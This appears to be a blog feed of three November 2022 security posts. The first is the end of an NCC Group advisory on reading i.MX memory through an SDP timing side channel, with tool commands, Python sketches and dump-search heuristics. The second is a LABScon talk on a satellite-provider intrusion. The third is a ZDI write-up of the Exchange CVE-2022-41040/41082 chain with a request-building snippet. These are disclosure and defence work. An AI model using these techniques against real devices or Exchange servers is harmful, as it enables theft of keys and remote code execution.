uuu (Universal Update Utility) for nxp imx chips -- libuuu_1.4.107-15-gd1c466c

Success 0    Failure 0

3:41     1/ 1 [============100%============] SDP: dcd -f ./target_config.imx
Okay

Care must be taken not to send a DDR configuration to the device more than once; doing so was observed to lock up the target. On HAB-enabled devices, only one DCD can be sent per boot. This implies that this step and the following step must be combined, with the DCD containing both the actual target configuration and the CHECK_DATA read primitive. As a result, a larger count value was required (due to the added DCD execution overhead) and only 1 bit per boot could be achieved on HAB-enabled devices. (Our experiment tooling automatically power-cycled the target after each bit read.)
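On HAB-enabled targets the readout loop therefore degenerates to one probed bit per power cycle. Schematically (power_cycle and probe are hypothetical helpers wrapping the reset logic and the combined DDR-config/CHECK_DATA DCD):

```python
def read_word_one_bit_per_boot(address, count, power_cycle, probe):
    """Recover one 32-bit word when each probe costs a full reboot.

    power_cycle()            - resets the target back into SDP mode
    probe(addr, mask, count) - sends the combined DCD, times the Report3
                               response, and returns the inferred bit (0 or 1)
    """
    word = 0
    for bit in range(32):
        power_cycle()
        word |= probe(address, 1 << bit, count) << bit
    return word
```

At 32 reboots per word, this mode is dramatically slower than the non-HAB case, which matches the throughput barrier noted in the recommendations.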

Step 4: Execute CHECK_DATA-based Memory Readout Attack

Finally, the CHECK_DATA timing side-channel can be exploited. The following invocation reads a 4KiB region of memory, bit-by-bit, starting at address 0x82000000.  The window threshold parameters establish which timing values to consider a 0 or a 1.  Our tool performs retries of any ambiguous results, up to a configurable maximum retry limit.

$ ./imemx -t -t-win-low 75000 -t-win-high 90000 -t-count 0x800 \
               -o data.bin -a 0x82000000 -s 4k

98.88% complete   51.26 B/s    ETA: 00:00:00.90
---------------------------------------
Completed in 1m19.901131805s
# Retries: 91

The following screenshot shows imemx running while Wireshark monitors the associated USB HID traffic.
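The thresholding and retry behavior can be sketched as follows; the decision logic and parameter names here are our reconstruction, not imemx's actual implementation:

```python
def classify_bit(t_resp_us, t_fast_max_us, t_slow_min_us):
    """Map one measured Report3 turnaround time to a bit value.

    t_fast_max_us: longest time still considered "check passed immediately"
    t_slow_min_us: shortest time considered "full iteration budget elapsed"
    Which timing mode corresponds to 0 versus 1 depends on the chosen
    mask/set semantics; here a fast response is taken to mean the probed
    bit was 1. Samples between the two thresholds are ambiguous.
    """
    if t_resp_us <= t_fast_max_us:
        return 1
    if t_resp_us >= t_slow_min_us:
        return 0
    return None  # ambiguous: retry, up to a configured limit
```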

Step 5: Analysis

The resulting data can then be analyzed to locate items of interest. For test purposes, vbindiff was used to compare the input test data with the data read back from the device. Some bit errors are expected due to the slow degradation of DDR contents; the degree of error is expected to increase with the amount of time since the device was powered off. An excessive number of errors may suggest that more appropriate time thresholds for bit value determination should have been chosen.

In reality, the (non-)triviality of this depends upon the target. API keys and session tokens in HTTP traffic may be conspicuous by virtue of their printable representation. Sensitive data in well-known file formats (e.g. a private key in SSLeay format) may be retrieved by simply running binwalk on the memory dump. Other scenarios, however, may require a more complex constraint-driven approach that leverages a priori knowledge (or inferences) about data structure layouts in order to make productive use of tools such as Volatility. Rather than attempting to extract all of DDR memory, a more efficient approach may be to read only as much memory as required to identify per-task kernel data structures, and then leverage these to further deduce the location of active memory mappings.
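As a cheap first pass over a recovered dump, conspicuous printable runs can be flagged before reaching for binwalk or Volatility. The heuristics below are illustrative only, and a real search should tolerate bit errors from DDR decay:

```python
import re

def find_printable_candidates(dump: bytes, min_len: int = 20):
    """Return (offset, snippet) pairs for printable runs that look interesting.

    Flags PEM private-key markers, HTTP Authorization headers, and long
    alphanumeric runs (possible API keys or session tokens). A crude first
    pass only; flipped bits will break exact substring matches.
    """
    hits = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, dump):
        run = m.group()
        if (b"PRIVATE KEY" in run
                or b"Authorization:" in run
                or run.isalnum()):
            hits.append((m.start(), run[:48]))
    return hits
```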

Conclusions

The limited data rate and expectation of random bit errors limit the effectiveness of this attack to scenarios in which an attacker would have prolonged access to a device they own, have found, or have stolen. Ultimately, the value (and lifetime) of potential assets would dictate whether or not a time investment of hours, days, or even weeks constitutes a worthwhile effort. In some situations, this may simply represent an attack that can be run “in the background” while developing and testing a custom OCRAM-resident firmware image to achieve the same result.

Recommendations

NCC Group recommends that affected NXP customers revisit the threat models of their own customers and products and take the following steps, if it is determined that:

  • Prolonged physical access to (lost, stolen) devices is plausible
       AND
  • Sensitive assets or confidential data may reside in DDR RAM

Mitigations

  • Disable SDP in production devices by setting the SDP_DISABLE eFuse bit to 1.
    • If available, also set UART Serial Download Disable eFuse bit to 1.
  • As a matter of security best practice, and especially for NXP devices without CAAM support (e.g. i.MX6ULL), seek to limit the lifetime of sensitive assets (e.g. key material) in memory, immediately overwriting memory locations with zeros or randomized patterns when these assets are no longer immediately needed by software.
  • If self-test or diagnostic functionality is required, implement this via an authenticated diagnostic unlock mechanism (pgs 20-23) in the first non-ROM bootloader stage.
  • If significantly privileged access is required to support failure analysis, with analyzed devices not being returned to the field, consider using HAB authenticated bootloader functionality and using the FIELD_RETURN fuse mechanism to perform a permanent return to an “insecure” diagnostic state.
  • If not doing so already, leverage the CAAM on supported chipsets for cryptographic operations, such that secrets such as key material are neither accessible to software executing on the device nor ever stored in DDR memory.
  • Although HAB-enabled devices remain vulnerable, enabling HAB appears to introduce an additional (data throughput) barrier to practical exploitation. If feasible, the use of authenticated boot functionality is encouraged.

While obscuring access to the SDP interface signals through PCB routing strategies or application of tamper-resistant potting or encapsulation compounds is not regarded by NCC Group as a solution, these approaches can impede efforts to exploit the vulnerability documented here.  When performing cost-benefit analyses for remediation efforts, an accurate threat model should first be created and reviewed in order to assess the plausibility of threats and the effectiveness of applied mitigations.

Vendor Communication

2022-08-18 – Draft advisory submitted to NXP PSIRT for coordinated disclosure.
2022-08-18 – NXP PSIRT acknowledges receipt of advisory.
2022-08-23 – NXP PSIRT indicates analysis of report and proof-of-concept are ongoing.
2022-08-31 – NXP confirms NCC Group’s finding of a novel attack and concurs with disabling SDP as being a viable mitigation. NXP PSIRT indicates other affected devices and mitigations are currently being evaluated.
2022-09-13 – NXP provides status update indicating additional time is required to complete product portfolio analysis and communicate with affected customers. 
2022-09-14 – NCC Group extends disclosure deadline by 30 days to accommodate the above.
2022-09-30 – NXP PSIRT provides status update.
2022-10-14 – NXP PSIRT provides status update and requests additional time to communicate with affected customers.
2022-10-14 – NCC Group extends disclosure deadline to Nov. 17th, 2022.
2022-11-11 – NXP PSIRT provides status update and indicates CVE-2022-45163 has been reserved.
2022-11-14 – NCC Group acknowledges receipt of information.
2022-11-15 – NCC Group sends update regarding upcoming publication.
2022-11-17 – NCC Group publishes advisory.

Acknowledgements

Thank you to Jeremy Boone, Jennifer Fernick, and Rob Wood for their always-appreciated, invaluable guidance and support. Additional gratitude is extended to NXP PSIRT for their responsiveness throughout the disclosure process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. NCC Group Hardware and Embedded Systems Services leverages decades of real-world engineering experience to provide pragmatic guidance on architecture and design, component selection, and manufacturing.

LABScon Replay | Demystifying Threats to Satellite Communications in Critical Infrastructure

By: LABScon
17 November 2022 at 14:23

Satellite communications are an integral part of many industrial control systems across many sectors, but their usage specifically in critical infrastructure continues to be misunderstood by the industry.

While there have been multiple investigations into vulnerabilities and exploitation methods of satellite systems, less attention has been given to threat vectors and how they actually impact the environments that rely on them.

Much buzz was generated by the Viasat outages in February 2022 and their effect on European wind turbines, but far less on how much the service disruption actually impacted these systems. In addition, much of the guidance on how to secure satellite communication systems focuses heavily on military applications, which can have different architectures and needs than those deployed in critical infrastructure networks.

In her presentation, Demystifying Threats to Satellite Communications in Critical Infrastructure, MJ Emanuel discusses an intrusion into an Inmarsat satellite provider within the US by an APT, which she has since attributed to Russian military intelligence, APT28.

Drawing on lessons learned from recent incident responses involving satellite companies and systems, this talk covers how different sectors rely on satellite communications, trust relationships of the satellite provider ecosystem that could be potentially abused by threat actors, how various attack methods could impact infrastructure processes, and potential ways to detect abuse.
 

Demystifying threats to satellite communications in critical infrastructure | MJ Emanuel: audio automatically transcribed by Sonix. This transcript may contain errors.

MJ Emanuel:
Good afternoon everyone, I was about to say morning. I'm here to talk about satellite communication usage in critical infrastructure.

I think this is something that we don't really fully understand. And so we just kind of like, say, that's scary, that's bad.

You know, there's a lot of, there is a lot of news and headlines about the wind turbine disruption after the ViaSat compromise.

But, you know, the wind turbines didn't actually stop producing energy. So I think we need to talk a little bit more about the nuance of when are data flows just interrupted and when is it visibility that's interrupted? And that's what I'm gonna try to do in this talk.

So my name is MJ Emanuel. I am on the ICS incident response team at CISA, in the threat hunting subdivision, and I do kind of a mix of forensics and threat intelligence. I will also be teaching at the Alperovitch Institute next semester about critical infrastructure and cyber.

So as I said, my goals for this talk are kind of to structure it around an incident response we had earlier this year at CISA for a SATCOM service provider. But I'm really going to be talking more about how data is generated in critical infrastructure and how it flows, because I think we need to understand what's normal before we can talk about how we can derive impacts from that. And then consequence-driven impact analysis is really, really the key to this.

So this is something that's really been pushed by INL for the past couple of years. If you've heard of CCE, that's consequence-driven, cyber-informed engineering. So it's something that's being talked about when we talk about how we design these systems. But I think it's something that we also need to bring to bear when we're analyzing these systems and thinking about threat intelligence for critical infrastructure.

So our incident kicked off just from an outside tip that there was suspicious activity in a telecommunications environment. We initially attempted to perform victim notification to this telecom provider, and then we quickly realized that the impacted entity wasn't the telecommunications provider, it wasn't the owner of the IP space: it was whoever they were leasing it to, and who they were leasing it to was a satellite communications provider.

I think this was like a perfect "oh, no, what did we just get into?" example that kind of highlighted what happened later in this case, because I don't think anyone, any of us really can appreciate how convoluted the satellite services industry is.

There's been an insane amount of consolidation and an insane amount of mergers that make it really opaque, and it makes it really hard to drive change because there are so many players on the back end that are never, ever interacting with the end users that are subscribing to the services.

So just an example: we're going to be talking mostly about Inmarsat BGANs for this talk, because that was the type of service that was impacted in the incident I'm going to talk about.

So this is just one of the many different types of satellite services that people can use. For this specifically, the satellites are owned by Inmarsat. There are basically only four of them, and the current generation runs on the L band. Basically, any of the data that's flowing is going to go up to one of those satellites and then come back down to only six ground stations around the world.

So something that's always going to happen when you're talking about using satellite services is how does that data flow from one of those six access stations back to the end users?

Because I think a lot of us kind of think about satellites like radios. We think the data is just going to go up and then down, but that's absolutely not how it happens. And when that data is in transmission, there are a lot of opportunities for there to be risk. And then there are also just three terminal manufacturers. So I'm not really going to talk about this, but when we talk about supply chain issues, because there are so many vendors in this space, there's just also a lot of opportunity there for there to be risk.

So after we initially started talking to the actual entity that was impacted by this incident, we quickly learned that they did have customers in critical infrastructure.

MJ Emanuel:
So CISA has both the legacy ICS-CERT and US-CERT incident response teams. That means that we're responsible both for critical infrastructure, or really any private sector companies that want to come to us, as well as for federal agencies. And I think that kind of gives us a little bit of a bias, because when a federal agency comes to us with an incident, it's very easy to realize that's something we want to resource. But when a random service provider comes to us, or we come to them, it's not something that's always going to be a priority.

One of the really big, I will say, lively debates about this incident was that a lot of people thought the service being provided was just going to be satellite phones, that it was just the phones and just voice communication being transmitted by these networks. That's absolutely not the case.

So I'm going to talk a little bit about what SCADA is, so we can kind of think about what was actually flowing through those environments. I think we kind of interchange a lot of terminology like it's all the same, but actually, ICS and SCADA are not interchangeable.

So ICS, industrial control systems, is kind of the larger bucket term. And then SCADA, supervisory control and data acquisition, really refers to a specific type: systems that are spread over a large geographic area. The opposite of that would be a DCS, a distributed control system, and that's really more like one specific location. So a DCS is something you might see at a specific power generation facility, something that's local, probably all wired. And then a SCADA system might be something like power transmission, with lines running over many miles.

And then this communication really is up to whoever engineered the system. You know, I've seen people lay fiber; I've seen people use microwave, cellular, satellite. It's really up to whoever designed the system. And then let's talk a little bit about what kind of data is being generated.

So if you look on the right side, these are kind of the field devices that are going to be at the lowest level. These are dumb systems: just your temperature sensors, your pressure sensors, maybe a valve that opens or closes.

And then the control of that system is going to come from the PLC, the programmable logic controller. So the data is either a command being generated by the operators sitting upstream at the control center and being pushed down to the field device, or it's some sort of temperature reading or other data that's being read and sent back upstream for the operator to have.

MJ Emanuel:
So that's the type of data we're talking about: both things like maintenance data as well as commands, the commands that change the physical state of those devices on the right.

So I kind of want to drive home that point about the translation between logic and physical change, and I think a really interesting way to do that is the configuration files from Industroyer2. So right here is one of the configuration files, or part of a configuration file, from one of the Industroyer2 samples. And I think Industroyer2 isn't that exciting technically, because all it's really doing is pushing commands in a specific protocol, the IEC 104 protocol, which is something mostly used outside of the US in the power sector.

But basically, what you can do if you try hard enough is you get these numbers, these IOAs: information object addresses. And then if you go back to the vendor documentation, in this case it was AB, you can start to map the IOAs back to the actual engineering functions they're referring to. So these numbers that were in the configuration file, you can map here to the data points that describe the engineering function. And then later in the documentation, you can start to translate those back to what is actually being changed.

And so in this case, it was both supervision alarms as well as circuit breaker failure, circuit failure, data failure, protection.

Those were the things being turned off and on by the configuration file of Industroyer2. So I think it's really hard to get to this level of understanding, because every SCADA environment is going to be engineered differently. It's not like an HTTP status code that's going to be standardized. And I think this is kind of the crux of why the field of ICS forensics has so much trouble: we keep approaching it like it's going to be something standard, like a lot of IT protocols, but it's really not about what function codes are being generated. It's about what systems they control at the end. And that's really hard to do.

The other thing that I wanted to talk about really quickly, which I guess I kind of already said: I think this is how we imagine a lot of data flows happening, from the specific control center back up and then down to the field, but it really looks like this. You almost always have at least one kind of third party that's going to be consolidating this information from the different end users and then sending it to the ground station, then to the satellite, and back down. So in the incident I'm talking about, this was what was compromised: it was one of those entities doing the consolidating.

I think they definitely had dozens, maybe over 100 customers, in a lot of different important sectors. And all of the data was being transmitted through this one entity.

So I love to talk about what the pain points are when we talk about critical infrastructure, what the things are that would have the most impact, and these types of service providers, as well as things like integrators, the people that are building these systems for their end users, are really, really sexy targets. And I think we should maybe focus a little bit more on them as we think about where things could be the most painful.

I had to kind of shorten this next part down, because I'd be well over time if I went into it. But I think we kind of touched on this yesterday in the fireside chat: I think it's really easy for us as researchers to blame end users for not implementing best practices, even really basic things like logging. But where are we now? It's 2022, and almost no one has logging in place in actual critical infrastructure entities or even small businesses. And I think it's time for us to stop judging them and just telling them to do it, and start giving them additional ways to do it and showing them how, because shaming them obviously isn't working.

MJ Emanuel:
So, the very, very, very limited data we had: the first thing they gave us was basically just two weeks' worth of firewall logs. We eventually were able to scrape some older historic logs from some of the backups they had, but we basically had no historic network logging at all for this incident, which had a multi-month dwell time.

So, just like in the real world, we can just say analysis happens, and then it happens. The initial findings for this incident honestly weren't that exciting: we were able to trace it back to an unpatched FortiGate. That was the FortiGate that was used for remote employees to log in to the service provider, but it was also the FortiGate that had static routes to all their customers; it was the last hop transmitting all of their data traffic. It was really fun. It was a CVE from 2018 for FortiGate; there's a Metasploit module for it. It's nothing that's hard to do. And what that vulnerability allows you to do is scrape creds from all of the active sessions running on the device. And so all the adversary had to do was move through the environment using those shared admin accounts.

MJ Emanuel:
And then the other thing: when we were interviewing the owners of this network, they kept saying, "But those are our backup devices. Those are emergency routes. Why is the adversary doing things they're not supposed to be doing?" And it's just like, yeah, I mean, it's still connected. They basically had an out-of-band FortiGate that used the same credentials as the real FortiGate.

So yeah, it was really not that hard for the adversary to move around. And the one thing that we really did see them doing was focusing on information that could give them additional access into the environment. Things like their network management platform, or their RANCID server, or their RADIUS database: these are all things we saw them being very interested in.

And then the thing that was the most concerning was that all of their customer traffic was flowing through the environment unencrypted. I kind of thought this was going to be the case, but honestly, I wasn't really sure, because I've never looked at a service provider network like this. So let's talk about what that actually means, if your data traffic is flowing unencrypted in an environment.

Here are some of the different protocols that we were able to capture, because we were tapping for, I think, three or four months with their permission. And this is a good time to plug that CISA does have some Bro parsers for ICS protocols on our GitHub.

MJ Emanuel:
So we are also always taking suggestions for additional protocols. So if any of you guys do like ICS monitoring and want something parsed, please talk to me after this.

So when we're talking about unencrypted protocols: basically, the reason the traffic was able to move that way was because the traffic was encrypted from here to here on that FortiGate, and then it was encrypted from here to here, but it's unencrypted in the middle. So it's just basic: they weren't using any encryption. But when we were interviewing a lot of their end users, with the permission of the company, most of them didn't realize their data was at risk in that way.

And this is actually a simplified diagram of how the data was flowing. There are actually two to three more hops to different telecommunication providers, and that means that data traffic was at risk at all of those different providers. So this was the point where people started to freak out, but I don't want us to do that yet. I think a really large misconception is that for some of these protocols, you can just push a function code that says, like, "do bad" and it will blow something up. That's not how it works. So we're going to talk a little bit about what it means if you can do something like read a coil or write a coil.

MJ Emanuel:
So, going back to the diagram earlier: if you are at that programmable logic controller and you're telling a temperature sensor to do something, or you're opening a valve when it shouldn't be, how much additional work does it take for there to be some sort of physical impact? That's really going to be unique to every case, and I think that's why doing true impact analysis on these systems is so hard.

So, initial conclusions about the incident that followed from the compromise: we're not going to be able to detect anything else they're doing, because there was no logging. The most exciting thing here is that they actually did take pcap and exfil it on the interface where the customer data traffic was flowing. So we knew that they knew what they had, or at least could have known what they had. We obviously don't know exactly why they did that, but in my opinion, they did understand the value of the data they had access to.

So what are the other potential consequences to that system? In order to illustrate this point, I'm going to talk about a specific sector which really heavily uses remote connectivity: natural gas pipelines. So the main point here is basically that the natural gas sector has three subcomponents.

MJ Emanuel:
There's production, there's transmission, and there's distribution. The important part here is that there are often a couple of really key players in the space; it's a very consolidated industry that does the transmission part. So they're responsible for transmitting gas across state lines over long distances, and then they have contracts with the distribution sector.

So what kind of data is being generated? I hope we now have a little bit of a better understanding of what data traffic looks like, but what are the types of things that it's being used to control?

One of those things is compressor stations. Basically every 50 to 100 miles on natural gas pipelines, there are compressor stations that filter the gas, recompress it, and cool it down. It just helps with the efficiency of those systems. So every 50 to 100 miles there is, excuse me, a remote site that is going to be doing those functions. And so there are both commands that need to be sent to those, as well as maintenance data or other data coming back about how those systems are operating. So that's one of the big reasons why they use remote connectivity.

And then the other really big one is the interconnect points. As the gas is coming from the transmission companies down to the distribution companies, the interconnect point is where, when Company X buys from Company Y, that valve is physically diverting how much gas they buy.

MJ Emanuel:
So in theory, an interconnect point is actually a much more exciting target to an adversary, because if you are able to compromise how that valve is working, then you can potentially turn off gas to any of the downstream customers.

And so that's the kind of data that's being generated. Now we're going to talk about how that data is at risk. What does it mean if commands are being spoofed? What does it mean if you can't see or don't have control over those environments, but maybe they'll still work, like with the wind turbines? What happens if you can't see them or control them?

And then the other really important part here is whether these are primary or secondary comms pathways. Luckily, because critical infrastructure operators often know that they're important, they do have a lot of redundancy built in. So when we were talking to a lot of the end users of the service provider, it varied by how their business contract worked out: were these satellite communications being used as just backups, or were they primary? And there was a mix of both.

And when we talk about impact to the control process, meaning the impacts from the different commands that are being sent versus the physical impacts to the system, I think a really helpful tool to generate those ideas is the ATT&CK for ICS framework from MITRE.

MJ Emanuel:
So this is the last three columns of that. The first two columns talk about the impact to the logic controller, and the last column is about the impact to the system as a whole.

Okay, I'm out of time but will go really quickly. Conclusions. When we talk about mitigations, I'm going to say I don't really know about mitigations, because I like to do threat analysis, not mitigations. But there was a lot of fanfare about the NSA cybersecurity advisory that came out a couple of weeks or months ago now. I think it's a really good starting point, but you can tell that it was really inspired by military applications of satellite communications; it doesn't really go into the nuances of other applications. One of the biggest things is it basically just says encrypt your systems, or excuse me, encrypt your data links, and they're not wrong. But when we're talking about real-time operations, you often can't just add transport encryption to that; it's going to mess up the timing. So I think we can't just keep telling people to read this.

MJ Emanuel:
We need to think a little harder about these systems. And then there's just other common sense, like "patch your systems," in that CSA. I think the biggest mitigation that I took away from this experience is that, for the customers that were the end users of that satcom provider, the biggest thing we were really informing them of was that there was a lot of risk they did not know about in the systems that they had implemented. So we just really need to continue to tell them that you can't treat your third-party communication pathways as trusted. You have to think about them like the public internet; even if it's a private data stream, it's really not private.

So, final thoughts. Systems are complicated. Let's be consequence-driven in our analysis; let's not just stop where the IT part stops, let's go all the way down to the physical process. And then, what drives change? When I was doing some of the research for this talk, I found a document from 2006 that basically said everything that I'm saying. So obviously what we're doing isn't working, and I think we need to stop getting spun up about ICS and actually talk about how we can protect these systems from an engineering perspective. Okay, that's it. Thank you. What questions do you have for me?

Ryan Naraine:
That was amazing. Thank you very much. Let's pick a gift for you. Any questions for MJ over here? Alex, quickly.

Question :
Sure. You know, basically, we don't have a base of knowledge, so it's a mindset of "don't touch it." So how did you move past that mindset, and what steps would actually change that?

MJ Emanuel:
Yeah, I think that's a really good question.

Ryan Naraine:
Repeat the question.

MJ Emanuel:
Yeah, sorry. Basically, I think your question was: how do we move past telling people not to touch their systems? I come from a cyber background, not an engineering background, and I think the first thing we have to do is basically education, which is kind of what I'm trying to do here: make it seem less scary and actually give people an understanding of the different pieces so that then we can have a conversation. But honestly, I don't know. Yeah.

Question :
So I think you're absolutely right, and educating industry is a very important step. But education without enforcement later doesn't work. It's like the security development lifecycle: you can teach developers how to write secure code, but if there's no enforcement, there will be tons of bugs.

MJ Emanuel:
Yeah, I think what I really meant wasn't educating the industry, but educating people in cybersecurity so that they can stop thinking of it as something "other" and then kind of move forward like we have with other cyber problems, if that makes sense. But it's hard.

Ryan Naraine:
Thank you. Another big round of applause for MJ.


About the Presenter

MJ Emanuel is an incident response analyst at the U.S. government’s Cybersecurity & Infrastructure Security Agency (CISA). Her work focuses on industrial control systems, threat intelligence, and forensics.

Prior to joining CISA, she was a malware and CTI analyst at the National Cyber Forensics and Training Alliance. She has a BA in environmental studies from Hendrix College and an MS in information security policy and management from Carnegie Mellon University.

About LABScon

This presentation was featured live at LABScon 2022, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.


Control Your Types or Get Pwned: Remote Code Execution in Exchange PowerShell Backend

16 November 2022 at 16:55

By now you have likely already heard about the in-the-wild exploitation of Exchange Server, chaining CVE-2022-41040 and CVE-2022-41082. It was originally submitted to the ZDI program by the researcher known as “DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q from GTSC”. After successful validation, it was immediately submitted to Microsoft. They patched both bugs along with several other Exchange vulnerabilities in the November Patch Tuesday release.

It is a beautiful chain, with an ingenious vector for gaining remote code execution. The tricky part is that it can be exploited in multiple ways, making both mitigation and detection harder. This blog post is divided into two main parts:

·       Part 1 – where we review details of the good old ProxyShell Path Confusion vulnerability (CVE-2021-34473), and we show that it can still be abused by a low-privileged user.
·       Part 2 – where we present the novel RCE vector in the Exchange PowerShell backend.

 Here’s a quick demonstration of the bugs in action:

Part 1: The ProxyShell Path Confusion for Every User (CVE-2022-41040)

There is a great chance that you are already familiar with the original ProxyShell Path Confusion vulnerability (CVE-2021-34473), which allowed Orange Tsai to access the Exchange PowerShell backend during Pwn2Own Vancouver 2021. If you are not, I encourage you to read the details in this blog post.

Microsoft patched this vulnerability in July of 2021. However, it turned out that the patch did not address the root cause of the vulnerability. Post-patch, unauthenticated attackers are no longer able to exploit it due to the implemented access restrictions, but the root cause remains.

First, let’s see what happens if we try to exploit it without authentication.

HTTP Request

HTTP Response

As expected, a 401 Unauthorized error was returned. However, can you spot something interesting in the response? The server says that we can try to authenticate with either Basic or NTLM authentication. Let’s give it a shot.

HTTP Request

HTTP Response

Exchange says that it is cool now! This shows us that:

·       The ProxyShell Path Confusion still exists, as we can reach the PowerShell backend through the autodiscover endpoints.
·       As the autodiscover endpoints allow the use of legacy authentication (NTLM and Basic authentication) by default, we can access those endpoints by providing valid credentials. After successful authentication, our request will be redirected to the selected backend service.
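As a rough sketch of the authenticated variant (hostname and credentials are placeholders; the `@`-based Autodiscover path is the well-known ProxyShell pattern, and real exploitation requires additional backend parameters not shown here):

```python
import base64

# Hypothetical target and credentials (placeholders for illustration only).
host = "exchange.local"
user, password = "user@exchange.local", "Passw0rd!"

# ProxyShell-style path confusion: the Autodiscover frontend forwards the
# portion after the '@' to the selected backend, here /powershell/.
path = "/autodiscover/autodiscover.json?a=a@foo.var/powershell/"

# Legacy (Basic) authentication is accepted by the autodiscover endpoints
# by default, so any valid mailbox credentials pass this check.
token = base64.b64encode(f"{user}:{password}".encode()).decode()

request = (
    f"GET {path} HTTP/1.1\r\n"
    f"Host: {host}\r\n"
    f"Authorization: Basic {token}\r\n"
    "\r\n"
)
print(request)
```

With legacy authentication blocked for Autodiscover, the same request is rejected before it ever reaches the backend.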

Legacy authentication in Exchange is described by Microsoft here. The following screenshot presents a fragment of the table included in the previously mentioned webpage.

Figure 1 - Legacy authentication in Exchange services, source: https://learn.microsoft.com/

According to the documentation and some manual testing, it seems that an Exchange instance was protected against this vulnerability if:

·       A custom protection mechanism was deployed that blocks the Autodiscover SSRF vector (for example, on the basis of the URL), or
·       If legacy authentication was blocked for the Autodiscover service. This can be done with a single command (though an Exchange Server restart is probably required):

Set-AuthenticationPolicy -BlockLegacyAuthAutodiscover:$true

So far, we have discovered that an authenticated user can access the Exchange PowerShell backend. We will now proceed to the second part of this blog post to discuss how this can be exploited for remote code execution.

Part 2: PowerShell Remoting Objects Conversions – Be Careful or Be Pwned (CVE-2022-41082)

In this part, we will focus on the remote code execution vulnerability in the Exchange PowerShell backend. It is a particularly interesting vulnerability, and is based on two aspects:

·       PowerShell Remoting conversions and instantiations.
·       Exchange custom converters.

It has been a very long ride for me to understand this vulnerability fully, and I find that I am still learning more about PowerShell Remoting. The PowerShell Remoting Protocol has a very extensive specification, and there are some hidden treasures in there. You may want to look at the official documentation, although I will try to guide you through the most important aspects. The discussion here should be enough to understand the vulnerability.

PowerShell Remoting Conversions Basics and Exchange Converters

There are several ways in which serialized objects can be passed to a PowerShell Remoting instance. We can divide those objects into two main categories:

·       Primitive type objects
·       Complex objects

Primitive types are not always what you would think of as “primitive”. We have some basic types here such as strings and byte arrays, but “primitive types” also include types such as URI, XMLDocument and ScriptBlock (the last of which is blocked by default in Exchange). Primitive type objects can usually be specified with a single XML tag, for example:
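The original post shows the example as an image; a reconstruction following the [MS-PSRP] serialization format (a string and a base64-encoded byte array, each expressed as a single tag) looks like:

```xml
<S>Hello world</S>
<BA>dGVzdA==</BA>
```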

Complex objects have a completely different representation. Let’s take a quick look at the example from the documentation:
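The documentation example is shown as an image in the original; reconstructed to match the description that follows (the exact property values are illustrative), it has this shape:

```xml
<Obj RefId="0">
  <TN RefId="0">
    <T>System.Drawing.Point</T>
    <T>System.ValueType</T>
    <T>System.Object</T>
  </TN>
  <Props>
    <I32 N="X">10</I32>
    <I32 N="Y">20</I32>
  </Props>
</Obj>
```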

First, we can see that the object is specified with the “Obj” tag. Then, we use the “TN” and “T” tags to specify the object type. Here, we have the System.Drawing.Point type, which inherits from System.ValueType.

An object can be constructed in multiple ways. Shown here is probably the simplest case: direct specification of properties. The “Props” tag defines the properties of the object. You can verify this by comparing the presented serialized object and the class documentation.

One may ask: how does PowerShell Remoting deserialize objects? Sadly, there is no single, easy answer here. PowerShell Remoting implements multiple object deserialization (or conversion) mechanisms, including quite complex logic as well as some validation. I will focus on two main aspects, which are crucial for our vulnerability.

a)     Verifying if the specified type can be deserialized
b)     Converting (deserializing) the object

Which Types Can Be Deserialized?

PowerShell Remoting will not deserialize all .NET types. By default, it allows those types related to the remoting protocol itself. However, the list of allowed types can be extended. Exchange does that through two files:

·       Exchange.types.ps1xml
·       Exchange.partial.types.ps1xml

 An example entry included in those files will be presented soon.

In general, the type specified in the payload that can be deserialized is referenced as the “Target Type For Deserialization”. Let’s move to the second part.

How Is Conversion Performed?

In general, conversion is done in the following way.

·       Retrieve properties/member sets, deserializing complex values if necessary.
·       Verify that this type is allowed to be deserialized.
·       If yes, perform the conversion.

Now the most important part. PowerShell Remoting implements multiple conversion routines. In order to decide which converter should be used, the System.Management.Automation.LanguagePrimitives.FigureConversion(Type, Type) method is used. It accepts two input arguments:

·       Type fromType – the type from which the object will be obtained (for example, string or byte array).
·       Type toType – the target type for deserialization.

The FigureConversion method contains logic to find a proper converter. If it is not able to find any converter, it will throw an exception.

As already mentioned, multiple converters are available. However, the most interesting for us are:

·       ConvertViaParseMethod – invokes Parse(String) method on the target type. In this case, we control the string argument.
·       ConvertViaConstructor – invokes the single-argument constructor that accepts an argument of type fromType. In this case, we can control the argument, but limitations apply.
·       ConvertViaCast – invokes the proper cast operator, which could be an implicit or explicit cast.
·       ConvertViaNoArgumentConstructor – invokes the no-argument constructor and sets the public properties using reflection.
·       CustomConverter – there are also some custom converters specified.

As we can see, these conversions are very powerful and provide a strong reflection primitive. In fact, some of them were already mentioned in the well-known Friday the 13th JSON Attacks Black Hat paper. As we have mentioned, though, the toType is validated and we are not able to use these converters to instantiate objects of arbitrary type. That would certainly be a major security hole.

SerializationTypeConverter – Exchange Custom Converter

Let’s have a look at one particular item specified in the Exchange.types.ps1xml file:
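The entry appears as an image in the original; a reconstruction of its shape, following the standard types.ps1xml schema (exact member definitions may differ from the real file), looks roughly like:

```xml
<Type>
  <Name>Deserialized.Microsoft.Exchange.Data.IPvxAddress</Name>
  <Members>
    <MemberSet>
      <Name>PSStandardMembers</Name>
      <Members>
        <NoteProperty>
          <Name>TargetTypeForDeserialization</Name>
          <Value>Microsoft.Exchange.Data.IPvxAddress</Value>
        </NoteProperty>
      </Members>
    </MemberSet>
  </Members>
  <TypeConverter>
    <TypeName>Microsoft.Exchange.Data.SerializationTypeConverter</TypeName>
  </TypeConverter>
</Type>
```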

There are several basic things that we can learn from this XML fragment:

·       Microsoft.Exchange.Data.IPvxAddress class is included in the list of the allowed target types.
·       The TargetTypeForDeserialization member gives the full class name.
·       A custom type converter is defined: Microsoft.Exchange.Data.SerializationTypeConverter

The SerializationTypeConverter wraps the BinaryFormatter serializer with ExchangeBinaryFormatterFactory. That way, the BinaryFormatter instance created will make use of the allow and block lists. 

